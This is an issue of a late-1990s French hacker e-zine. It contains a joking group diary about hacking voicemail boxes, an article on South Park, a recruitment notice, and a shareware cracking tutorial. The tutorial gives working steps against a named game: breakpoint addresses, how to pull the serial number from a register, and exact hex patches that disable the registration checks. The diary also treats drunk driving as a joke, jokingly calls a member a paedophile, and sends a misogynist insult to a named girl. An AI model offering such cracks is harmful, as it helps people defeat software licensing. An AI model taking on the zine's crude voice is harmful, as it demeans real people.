sur moi et chantent Ma benz-benz-benz... On arrive à la Williams de Cedru : -Cedru, souffle dans le ballon, fais pas le con ! -Naon.........ahwahbien.......a....peu.........conduire....laisse moi.........zoomzoomzen... .......dans ma...........Williams-iams-iams... Cedru rentre dans sa caisse, la démarre et se casse en zigzagant, et voilà un danger de plus sur la route avec 150 chevaux au cul... On n'est plus que deux: on retourne aux cabines faire des scans... Fugitif se trompe de touches, n'arrive plus à tenir le combiné... 17:30: On arrive à l'espèce de fantomette-mobile qui sert de moyen de déplacement à Fugitif. C'est même pas la peine de lui demander de souffler dans le ballon, il voudra pas... - Sois prudent sur la route avec ton...ta...euh...enfin ce sur quoi tu es assis ,quoi ! Et Fugitif se casse : je suis seul Je m'emmerde et donc je traîne un peu encore dans les rues... Mais merde ou est-ce que j'ai garé ma Lancia Delta Integrale HF Turbo 4WD ? ( c'est ma nouvelle caisse je viens de l'avoir d'occase... ) Ah ça y est je la vois... Je rentre dedans, et elle démarre sans problème...comme d'hab quoi ! Et me voilà lancé à 200 sur la nationale... *La rédaction tient à préciser que ce n'est pas parcequ'on a de belles bagnoles qu'on est pas forcément des flambeurs... Et ce n'est pas non plus parcequ'on a pas de belles bagnoles qu'on n'aurait pas le droit de flamber nous aussi.* Direction : Chez CARO. Après la soirée de Samedi soir chez Cedru ( désolé mais je peux pas en dire plus, Cedru l'a déjà fait et tout le monde est au courant ) elle est folle de moi ( oui Cedru je sais mais ta gueule ). La fin de l'article ne dit pas comment a fini la soirée ( putain de censure ! ) mais pour mes fans en folie qui s'interessent à ma vie sachez qu'elle a bien fini. Mais vous pouvez quand même continuer à envoyer des e-mails chez Cedru qui fera suivre ( ou m'envoyer un msg sur ma BAL...), ne soyez pas jalouses les filles. Je profite donc de l'occase pour envoyer un petit message perso pour Caro, en anglais comme ça y aura moins de monde qui comprendra : Caro you'll be my love forever but now I don't love you any more. So fuck you bitch I do not want to see you again ! Hum voilà, je vous ai prouvé mes talents d'anglophone et de remplisseur parce que j'ai rempli presque deux pages de conneries... Si vous avez des questions, des commentaires ou des suggestions à faire, des infos,... envoyez-moi un message au 0800 397 397 boîte vocale 5375. Si tu fais partie de mes fans et que tu es une fille envoie-moi un message sur la boîte n°XXXX (Vue par Cedru) Alors voilà, Cedru, Fugitif,Heartwork666 et moi on décide de se retrouver un samedi après-midi pour discuter et hacker des VMB dans le but d'écrire un article ( oui bon celui la ne parle pas de VMB mais c'est quand même un article, non ?). NdCedru : Bon jusque là c'est vrai après ça se dégrade... On a un RDV à 15h devant un lycée. 14h50: Bien entendu, j'arrive le premier.Il fait beau, chaud, c'est le printemps, les oiseaux chantent, le soleil brille, le ciel est bleu ( non je ne me prends pas pour celui de la météo Gillot-petré je-sais-pas-quoi ). 15h00: Cedru et HeartWork ( oui vous savez c'est celui qui hiberne :-) ) arrivent sans se presser.Fugitif arrive quelques minutes après.Ca y est on peut commencer. Direction : les cabines les plus proches. On met du temps pour y arriver: Cedru n'arrête pas de s 'arrêter pour mater les Q qui passent. Ses goûts sont assez bizarres mais bon passons... Ndcedru : Bon Voilà ma version vous remplacez Cedru par DRooPY pour les scènes d'obsédés sexuels! :) Pour les lectrices qui seraient intéressées, je précise que les tranches d'âge préférées de Cedru sont les 5-10 ans :-)) Ndcedru : Donc la il faut lire que les tranches d'âge préférées de DRooPY c'est les 5-10ans, c'est un pédophile qui souffre de complexes. 15h10: Ca y est on est aux cabines. Chacun s'en prend une ( une cabine bien sûr bande d'esprits tordus !!!) et on commence à jouer. J'écoute mes messages sur le 0800 397 397 : Ma boîte perso est saturée de messages, j'en reçois en moyenne 15 par jour. Ndcedru : C'est pas vrai il ne reçoit pas 15 messages c'est un mythomane comme mec, et en plus il a pas d'amis!!!!! :)) AHAHHAHA!! NdDRooPY: La vengeance est un plat qui se mange froid.... 15h20: Cedru est fasciné de nous voir tous en pleine action et sort de son sac à malices un appareil photo jetable datant des années 60... Et il nous prend tous les trois en train de téléphoner. Cedru est quelqu'un qui s'interresse à tout et qui aime faire partager aux autres son savoir: quand il sera de retour dans sa tribu, il va montrer aux autres ce qu'est la civilisation et ce qu'est un téléphone. Ce jour n'était pas le bon : on n'a pas trouvé grand chose sur ces VMB... Ndcedru : Bon ok pour le téléphone c'est vrai, mais vous auriez vu les têtes de con qui se payaient dans les cabines et surtout fugitif dans celle des handicapés qui disait aux gens je cite : " Vous avez un problème?? Je suis handicapé vous voyez pas!!! " 15h50 : On se retrouve assis dans un bar : HeartWork boit une tequila et fume comme un pompier ( heureusement ce n'est pas des joints :-)), Cedru boit un whisky-coca, Fugitif lui a pris un Martini. Moi, je bois une grenadine. Il faut bien que quelqu'un garde l'esprit clair dans une bande d'alcolos ! On discute, mais j'ai l'impression de parler dans le vide avec cette bande de lamers... Ndcedru : Bon la c'est vrai on buvait pas mal et le petit joueur de DRooPY buvait sa grenadine et disait aux petites filles qui passaient vous voulez goutter à ma sucette? 16h10: Tout le monde recommande la même chose, sauf moi, j'ai plus soif... Cedru se fait des torticolis à se retourner tout le temps pour mater, c'est pas grave, c'est l'âge, ça passera... Ils recommandent la même chose, encore et encore... Ndcedru : Donc comme je disais il était entrain de se faire des torticolis en essayant de trouver des amis pour la vie et des jeunes filles pour..... NdDRooPY:Cedru ça rime avec esprit tordu ... 16h40: HeartWork a fumé 3 paquets, et tout le monde a un gramme de sang noyé dans un litre d'alcool, sauf vous l'avez deviné, MOI ! HeartWork se casse : on n'est plus que trois... 16h50: On se casse, moi au milieu, Fugitif d'un côté,Cedru de l'autre, ils s'appuient sur moi et chantent Ma benz-benz-benz... On arrive à la Williams de Cedru : -Cedru, souffle dans le ballon, fais pas le con ! -Naon.........ahwahbien.......a....peu.........conduire....laisse moi.........zoomzoomzen... .......dans ma...........Williams-iams-iams... Cedru rentre dans sa caisse, la démarre et se casse en zigzagant, et voilà un danger de plus sur la route avec 150 chevaux au cul... On n'est plus que deux: on retourne aux cabines faire des scans... Fugitif se trompe de touches, n'arrive plus à tenir le combiné... Ndcedru : Moi j'aime bien ma Clio Williams et en plus je suis rentré entier alors comme quoi je conduis bien! ;) 17:30: On arrive à l'espèce de fantomette-mobile qui sert de moyen de déplacement à Fugitif. C'est même pas la peine de lui demander de souffler dans le ballon, il voudra pas... - Sois prudent sur la route avec ton...ta...euh...enfin ce sur quoi tu es assis ,quoi ! Et Fugitif se casse : je suis seul Je m'emmerde et donc je traîne un peu encore dans les rues... Mais merde ou est-ce que j'ai garé ma Lancia Delta Integrale HF Turbo 4WD ? ( c'est ma nouvelle caisse je viens de l'avoir d'occase... ) Ah ça y est je la vois... Je rentre dedans, et elle démarre sans problème...comme d'hab quoi ! Et me voilà lancé à 200 sur la nationale... Ndcedru : c'est vraiment un mythomane, il est pas encore majeur et pense conduire une Lancia Delta Integrale turbo prout à réaction mais c'est peut être le nouveau nom qu'on donne à la marche? *La rédaction tient à préciser que ce n'est pas parce qu'on a de belles bagnoles qu'on est pas forcément des flambeurs... Et ce n'est pas non plus parce qu'on a pas de belles bagnoles qu'on n'aurait pas le droit de flamber nous aussi.* Direction : Chez CARO. Après la soirée de Samedi soir chez Cedru ( désolé mais je peux pas en dire plus, Cedru l'a déjà fait et tout le monde est au courant ) elle est folle de moi ( oui Cedru je sais mais ta gueule ). Ndcedru : Je suis désolé de te casser tes espoirs mais Caro c'est une.... que j'ai payé pour sortir avec toi car tu avais l'air seul ! ;) La fin de l'article ne dit pas comment a fini la soirée ( putain de censure ! ) mais pour mes fans en folie qui s'interessent à ma vie sachez qu'elle a bien fini. Ndcedru : Oui j'ai encore censuré mais bon personne m'en voudra de censurer les articles de DRooPY?? Mais vous pouvez quand même continuer à envoyer des e-mails chez Cedru qui fera suivre ( ou m'envoyer un msg sur ma BAL...), ne soyez pas jalouses les filles. Ndcedru : J'attends toujours des messages pour DRooPY après il va pleurer et me dire qu'il a pas d'amis... NdDRooPY: Ouin,ouin, j’ai pas d’amis ! Je profite donc de l'occase pour envoyer un petit message perso pour Caro, en anglais comme ça y aura moins de monde qui comprendra : Caro you'll be my love forever but now I don't love you any more. So fuck you bitch I do not want to see you again ! Hum voilà, je vous ai prouvé mes talents d'anglophone et de remplisseur parce que j'ai rempli presque deux pages de conneries... Ndcedru : Putain de lamers qui m'écrit des textes au format .doc et qui a pas encore compris que le mags était écrit sous wordpad. RAH!!!!!!! Ca doit être pour pouvoir corriger ses fautes d'orthographe ! ;) Si vous avez des questions, des commentaires ou des suggestions à faire, des infos,... envoyez-moi un message au 0800 397 397 boîte vocale 5375. Si tu fais partie de mes fans et que tu es une fille envoie-moi un message sur la boîte n°XXXX NdDRooPY: Alors là Cedru bravo pour la repompe j’aurais pas fait mieux !!! :-)) Et merci d’avoir payé Caro pour m’offrir du bon temps ! ================================================================================================ NOUVELLE SERIE CULTE SOUTHPARK ( 1/2 ) By Droopy ================================================================================================ Ouais je sais cet article ne parle pas de hacking (comme tous les autres articles que j'ai écrits d'ailleurs !). Vous avez sûrement entendu parler de Southpark mais certaines personnes ne le connaissent peut être pas encore. Tout d'abord la diffusion de cette série a débuté pendant la fin de l'été 98 sur Canal +. Les horaires actuels sont le Samedi 21h45 et redif le lendemain à 12h05.Les épésodes en V.O sont diffusés généralement tard le soir... DEFINITION Southpark se compose d'une série de dessins animés ( une trentaine ) d'une durée de 25 minutes chacun. Les dessins sont dessinés à la manière d'un gosse de 4 ans, ce qui est aussi l'âge mental de cette série et c'est ce qui fait son charme. On peut définir cette série comme politiquement-incorrecte, grossière, scatologique... mais c'est avant tout une réflexion sur la société actuelle. HISTORIQUE L'idée de cette série revient à deux types géniaux : Trey Parker et Matt Stone. Le premier épisode de cette série avait été réalisé avec des découpages et des collages : Trey et Matt manquaient de moyens ! Puis cette vidéo ( tirée à peu d'exemplaires ) arriva entre les mains de George Clooney pendant les fêtes de Noël. Il fut tout de suite emballé par cet épisode et fit des centaines de copies qu'il distribua à tous ses amis d'Hollywood.Vous vous en doutez, les producteurs se jetèrent dessus, et ...Southpark était né ! LES CREATEURS Trey Parker et Matt Stone se sont connus à la fac et avaient tous les deux un amour commun pour la connerie. Ils ressemblent un peu à DUMB & DUMBER. Ce sont deux types complètement allumés ! Ils sont créateurs de la série, à eux deux font plusieurs voix dans la série dont les 4 persos principaux, ils écrivent les scénarios et les dialogues, composent et interprètent des chansons de la série. Ils sont vraiment à fond dans ce qu'ils ont créé et c'est cette passion qui a fait qu'aux US Southpark a fait un tabac. Mais Southpark n'a été diffusée que sur des chaînes privées ( câble... ) et c'est ce qui a permis de passer à travers la censure, très active aux US surtout pour les chaînes publiques. Trey Parker et Matt Stone ont environ 24 ans. J'ai vu un reportage où on demandait à un des deux ( je me souviens plus duquel ... ) ce qu'il savait dire en français : (en français ) J'ai la plus grosse bite du monde ! ( rires ) ( en anglais ) Je sais le dire dans toutes les langues ! ( rires... ) SOUTHPARK C'est une petite ville du Colorado où se passent des choses bizarres. Parodies de films, de livres, caricatures de stars du show-bizz américain, gros mots, blagues sur les pays étrangers, massacre de Sadam Hussein...tout y est dans Southpark. Quelques meilleurs titres pour vous donner envie : -Cartman a une sonde anale ( Cartman gets an anal probe ) Le premier diffusé sur C+. Des extraterrestres envahissent Southpark... -Volcano ( Volcano ) Un volcan près de Southpark se réveille... - Une ballade complètement folle avec Al Super Gay ( Big Gay Al's boat ride ) Sans commentaires... -Le Charmeur de poulets ( The Chicken Lover ) Un type viole des poulets... Mais le meilleur épisode reste celui de Noël mais je ne me souviens plus du titre. Apparition de Mr Hankey ( petit caca-noël ) LES PERSOS Alors là il y en a plein - occupons-nous tout d'abord des principaux Eric CARTMAN C'est le plus gros de la bande et il dit tout le temps des gros mots. Célèbre réplique : That kicks ass ! ( Ca troue le cul ! ) Sur la bande son du dessin animé 1 chanson ( Sailing away ) super bien chantée... Voix: Trey parker La voix en V.O est tout simplement géniale et c'est à mon avis la meilleure de la série Stan MARSH Chef de la bande Maltraité par sa soeur En pince pour Wendy et lui gerbe dessus à chaque fois qu'elle lui parle Célèbre réplique : Oh my God they killed Kenny ! ( Oh mon dieu ils ont tué Kenny ! ) Voix: Trey Parker Kyle BROSLOFSKI Se fait emmerder parce qu'il est Juif mais ne sait pas ce que ça veut dire. A un petit frère : Ike et joue avec lui à Kick the baby ! ( shoote dans le bébé ! ) Célèbre réplique (associée à cele de Stan ):You Bastard ! ( espèce d'enfoirés ! ) Voix: Matt Stone Kenny MC CORMIK Le plus intelligent sur les choses des grandes personnes On ne peut pas le comprendre à cause de son anorak et on entend Mumph....Mmm.... Meurt de manière atroce dans presque tous les épisodes Très pauvre Voix: Matt Stone Voilà pour cette première partie. Dans la seconde je parlerai des autres persos, et je donnerai des conseils pour apprécier la série ... ================================================================================================ Initiation au cracking By Little Bob ================================================================================================ I Introduction Le shareware, c'est bien. C'est très bien même. Nous allons voir pourquoi... Vous vous êtes sûrement déjà retrouvé devant un logiciel très intéressant, mais qui refuse de fonctionner plus de 30 jours (parfois même 15), ou dont les fonctionnalités principales (sauver, imprimer) sont inaccessibles... Rageant, non ? Je vous propose ici d'apprendre à les cracker (à savoir : retirer la limite de temps, débrider le prog...). Deux méthodes existent pour cracker : la première (la plus facile à utiliser, à mon avis, et que je conseille fortement aux débutants) est le Dead Listing. En gros, on désassemble le programme (avec Win Dasm 8.93), on regarde ce qu'il fait, à quel moment, et on bidouille pour réussir à contourner la limitation shareware. La deuxième, c'est le debugging Live, où il s'agit de savoir ce que fait le programme en temps réel (avec SoftIce), ce qui est beaucoup plus complexe que le Dead Listing. En gros, on lance le programme on suit ce qu'il fait, on trouve l'endroit où il se bride, et on inverse la machine. Attention, il n'y a pas de méthode meilleure qu'une autre, l'idéal étant de toutes les connaîtres et de toutes les utiliser au moment propice. II Matériel nécessaire Un PC Une imprimante Un shareware à cracker Un bouquin résumant les principales fonctions de l'assembleur (50 francs environ) WinDasm 8.93 SoftIce Un éditeur hexadécimal (HexWorkShop est pas mal et sous Windows) Un paquet de clopes (les Lucky Strike sont très bonne pour la réflexion) Du Gin ou du Whisky (moins bon pour la réflexion, mais ça donne du courage) Un cerveau Des mains Des yeux III Théorie Je sais ce que vous pensez : la théorie, on en a rien à foutre, c'est mieux la pratique... Je suis d'accord avec vous ! Seulement, essayez de regarder un Dead Listing sans avoir fait de théorie, vous allez rigoler ! Bon, assez glandé, une gorgé de Gin et on y va... La plupart de ces programmes ont été conçus selon le même schéma : d'abord, on crée la version complète, ensuite on la bride, ce qui signifie que TOUTES les fonctionnalités sont encore dans le programme, mais que certaines ont été rendues inaccessibles... Eh oui ! Ca coûte moins cher de faire comme ça plutôt que de faire deux versions différentes ! Résultat : grâce à leur envie de plein de sous, les programmeurs nous aident à cracker leurs programmes !!! Plusieurs approches pour le faire sont disponibles. On peut essayer de s'amuser à réactiver les fonctions une par une (avec l'aide de WinDasm). Bof... C'est compliqué et ça ne donne pas forcément de bons résultats. On peut essayer de trouver un bon numéro de série (pour les programmes qui en demandent un, évidemment). La méthode est simple (la pratique un peu moins, SoftIce ayant une fâcheuse tendance à tout faire planter). Lancez WinDasm, et cherchez dans le prog la ligne où il nous balance "Mauvais code" ou un truc dans le genre. Notez le numéro de la ligne. Ouvrez le prog à cracker avec le Symbol Loader de SoftIce (je vous l'avais bien dit que les deux ensemble, c'était mieux). Lancez le debugging : normalement, SoftIce (un écran Dos tout moche) devrait s'ouvrir (sinon, Control D). Tapez bpx (ca met un breakpoint) suivi de l'adresse relevée, puis Contol D. Le prog continue à tourner (si SoftIce n'a pas planté entre temps) et allez vite mettre un nom bidon, et un numéro de série pêché au fin fond de votre esprit brumeux (d'autant plus brumeux que c'est déjà la cinquième Lucky depuis le début du debugging du soft, et que la bouteille de Gin y est passée). Faites OK et (O miracle), SoftIce s'ouvre (normal, ça sert à ça un bpx). En fait, il s'est arrêté juste après avoir comparé le numéro de série que vous avez entré avec le numéro valide. En général, il stocke le numéro valide en eax (ou ebx, ecx, edx : ça, ce sont les registres du processeur (sa mémoire, en gros)), sinon, allez zieuter un coup avec WinDasm autour de la chaîne (string) "mauvais code", où ça a été stocké... Sous SoftIce, tapez d eax pour voir ce qu'il y a dans eax. Là c'est plus compliqué : c'est en hexadécimal (pas étonnant). Donc un conseil : notez tout, éteignez l'ordi, prenez vos Luckies, allez au café du coin et commandez une bonne bière. Ensuite, regardez, observez, calculez et essayez de trouver quelque chose (vous aurez inévitablement besoin de connaître les modes de calcul en hexadécimal (ça serait con de se lancer dans le cracking sans les connaître !)). Finalement vous trouvez plusieurs séries de caractères différentes : essayez-les toutes jusqu'à trouver la bonne ! Si le prog est simple et que vous avez de la chance, le code se trouve écrit en ascii dans la colonne de droite. Avec cette méthode, vous n'avez pas vraiment cracké (le prog n'a pas été modifié), vous avez seulement bidouillé. Pour vraiment cracker, il vaut mieux utiliser le Dead Listing, pour regarder ce que fait le prog et quand. Ainsi, au moment de la routine de vérification du code, il fera un test entre le code entré et le bon, et, si ce ne sont pas les mêmes, il fera un saut (je ou jne, en général) jusqu'à la boîte de dialogue " Mauvais code ". L'astuce consiste à inverser le saut, afin que le prog croie que le code est bon alors qu'il ne l'est pas du tout. Attention : il faut inverser le saut de l'enregistrement ET le saut de vérification au lancement du prog (c'est impératif). IV La pratique Bon, pour la pratique, nous allons nous attaquer à Memory Game 95 (http://www.multimania.com/chezlittlebob/mem95.zip). Ce jeu, dont le principe est, il faut l'avouer, plutôt inintéressant, a un côté passionnant pour l'apprenti-crackeur : il reprend point par point les théories que je viens de vous énoncer. C'est une cible parfaite. En plus, il possède une option " unregister " qui permet de refaire plusieurs essais. Commençons par le désassembler avec Win Dasm 8.9. On cherche la ligne " Sorry ! The registration... " (avec la boîte de dialogue " String References ") et on la trouve deux fois : en 00405C50 et en 0040B9BC. Pour vous éviter des recherches, je vous aide un peu : la première est le contrôle effectué au lancement du prog, et la seconde celui effectué à l'enregistrement. C'est donc le deuxième qui nous intéresse pour le moment. Dans Win Dasm, lancez " Load Process " (Ctrl-L). Dans la fenêtre principale, cliquez sur " Goto Code Location " (Shift-F12) et entrez 0040B9BC. Posez un point de break sur cette ligne (Ctrl + Click gauche) et lancez ensuite " Run " dans la fenêtre " process " (une des nombreuses fenêtres ouvertes). Dans le menu " Game " du jeu, lancez " Register ", entrez comme nom : Little Bob, et comme serial : n'importe quoi --> Win Dasm beep et le prog bloque. Retournez dans Win Dasm, et, dans une des fenêtres, cliquez sur edx. Normalement, juste à côté, dans la partie ASCII, vous devriez lire : AC2B8FC94340C598. C'est notre code ! Notez-le, quittez Win Dasm et lancez le jeu, faitez " Register ", entrez le nom, le code, OK : c'est gagné ! ! ! Vous venez de cracker votre premier jeu ! (NB : La même chose aurait pu être réalisée avec Soft Ice.) C'était un peu facile, il faut l'avouer, d'autant plus que le numéro de série n'était pas codé en mémoire. Il se pourrait très bien que vous ne parveniez pas, pour certains (et la plupart) des programmes à trouver ce numéro aussi simplement. Il vaut mieux s'attaquer au programme lui-même. Voyons un peu comment la phase d'enregistrement fonctionne... Lorsque vous entrez un mauvais numéro de série, une fenêtre s'ouvre et vous crie : " Registration... ". C'est bon pour nous. Allez dans Win Dasm, recherchez cette chaîne : vous trouvez deux références décrites plus haut. Encore une fois, la deuxième seulement nous intéresse (pour le moment.) Vous devriez trouver ceci : ------------------------------------------------------------------------------------------ * Referenced by a (U)nconditional or (C)onditional Jump at Address: |:0040B744(C) | Possible Reference to String Resource ID=61244: "Sorry, the registration... | :0040B9BC 683CEF0000 push 0000EF3C etc... ------------------------------------------------------------------------------------------ " Referenced... " signifie que cette ligne est appelée par un saut (Jump) conditionnel (C) à l'adresse 0040B744. C'est donc à cette ligne (et celles qui sont autour) qu'il faut aller voir : ------------------------------------------------------------------------------------------ :0040B742 85C0 test eax, eax :0040B744 0F8572020000 jne 0040B9BC ------------------------------------------------------------------------------------------ D'abord il teste un bidule quelconque, ensuite il saute si ce n'est pas égal (à quoi ? ? ?). En clair, il déclare le code mauvais si ce n'est pas égal. Il suffit d'inverser le saut (je à la place de jne) et le tour est joué : prenez un éditeur hexadécimal, recherchez 85C00F8572020000 et remplacez le 0F8572 par OF8472. Désormais, le seul cas où il dira " Sorry, the registration... " sera le cas où vous aurez entré le bon code ! ! ! Donc, afin de faire plus pro, mieux vaut carrément effacer cette instruction en remplaçant le jne par une série de nop (= ne fait rien). Ainsi, il faudra remplacer 0F8572020000 par 909090909090. Cette fois-ci, tous les codes (valides ou non) sont bons ! ! ! Testez votre oeuvre : le prog vous enregistre, tout est OK. Quittez et relancez : il vous crie de nouveau que le code est mauvais. Cela veut dire qu'il vérifie le code à chaque démarrage du jeu, donc qu'il appelle une routine au début : c'est ici que va nous servir la première des deux chaînes trouvées précédemment, inutilisée encore : ------------------------------------------------------------------------------------------ 00405C45 85C0 test eax, eax :00405C47 0F8434010000 je 00405D81 :00405C4D 8B45E4 mov eax, dword ptr [ebp-1C] * Possible Reference to String Resource ID=61244: "Sorry, the registration code does not match! Try again or Ca" ------------------------------------------------------------------------------------------ Le principe est différent (inverse, même) : il teste, si c'est égal il saute par dessus et considére que le code est bon. Même principe que tout à l'heure : soit on inverse (remplacer 0F8434 par 0F8534), soit on remplace non pas par des nop, mais par un saut obligatoire (quoi qu'il arrive, le programme dit : code OK !). Dans ce cas, remplacer 0F8434010000 par E93501000090. Arrivé à ce stade, le programme est entièrement cracké : impossible d'aller plus loin ! Bravo ! ! ! J'espère que ce cours vous aura aidé. En tout cas s'il vous a plu, si vous désirez me poser des questions, me faire des remarques ou des suggestions, n'hésitez pas à me contacter (littlebob57@yahoo.fr), même pour me demander d'écrire un cours spécifique pour un prog. Vous pouvez aussi visiter ma page Web dédiée au cracking (http://www.multimania.com/chezlittlebob/) : vous y serez bien accueilli ! Si, d'aventure, mon URL était changée, mon Email littlebob57@yahoo.fr ne serait pas modifiée : vous pourrez toujours me contacter, pour me demander, entre autres, mon URL actuelle ! Amusez-vous bien et bonne chance ! Little Bob ================================================================================================ Recrute pour un groupe de hacker ================================================================================================ Donc nous cherchons tout hackers(ou hackeuses) voulant se joindre à notre groupe. Du newbies aux pros nous en foutons de votre niveau: du moment vous ecrivez des articles. Mais pour cela vous devrez respectez certaines conditions: - Faire des articles bien clair et comprehensif. - Ne poa parle kome ca parceke sinon on pige poa ok? NDCedru : alors pourquoi on m' a prit? - Ne pas venir dans le groupe pour de mauvaises intentions. Ndcedru : on m'aurait menti!!! - Ne pas donnez de fausse infos. NdCedru : on m'a manipulé je te jure!!! - Ne donnez aucune infos personnelles dans vos articles. - Respectez tout les menbres du groupe. - Essailez de pas trop faire de fautes ok?? NdCEdru : tu parles pour moi c ça?? ;) Bon ca devrait suffir pour les conditions :-) Remarque: Vos articles peuvent parler de tout. Ndcedru : voir numero 1 et 2 et mes articles de mes conneries Pour l'inscription c'est par e-mail que ca se passe: Envoyez un courrier à: fugitif@hotmail.com ou Cedru13@hotmail.com (surtout la pour les filles!! ) En indiquant: - Votre nick et votre E-mail. - Vous vous presentez un peu...(niveau,specialite...) EHeh spécialité!!! :) j'adore! En joigant: - Votre ou vos articles qui seront publies dans le prochain nø. NdCedru : non il rigolait, il faudra plutot lire qui ne sera jamais publie dans les prochains numeros!! Censure oblige!! :) ================================================================================================ Dans le prochain n° et le mot de la fin ================================================================================================ Ben envoyez nous vos articles deja, sinon: - Service Courrier - Vos articles. - Les meilleurs site Web By Cedru - the Hilty trilogy épisode 3 - Les ragôts du Net - Suite de l'article sur la grève - 2 projets en phreaking By Fugitif - Protections de merde! By Fugitif - Programmation d'un client/serveur By Fugitif - Programmation d'un trojan serveur FTP By Fugitif Le mot de la fin : DRooPY: Vous pouvez remarquer que le taux de fautes d’orthographe a diminué: C’est DRooPY qui est encore passé par là ! Sinon bienvenue à tous les nouveaux et merci à Cedru pour son aide... Fugitif : Ben, c'est cool de voir notre mag evolué de cette maniere la! @+ pour le n°6. Cedru : Droopy c'est un chien avec ses amis, sinon la mag devient de mieux en mieux ! :) The End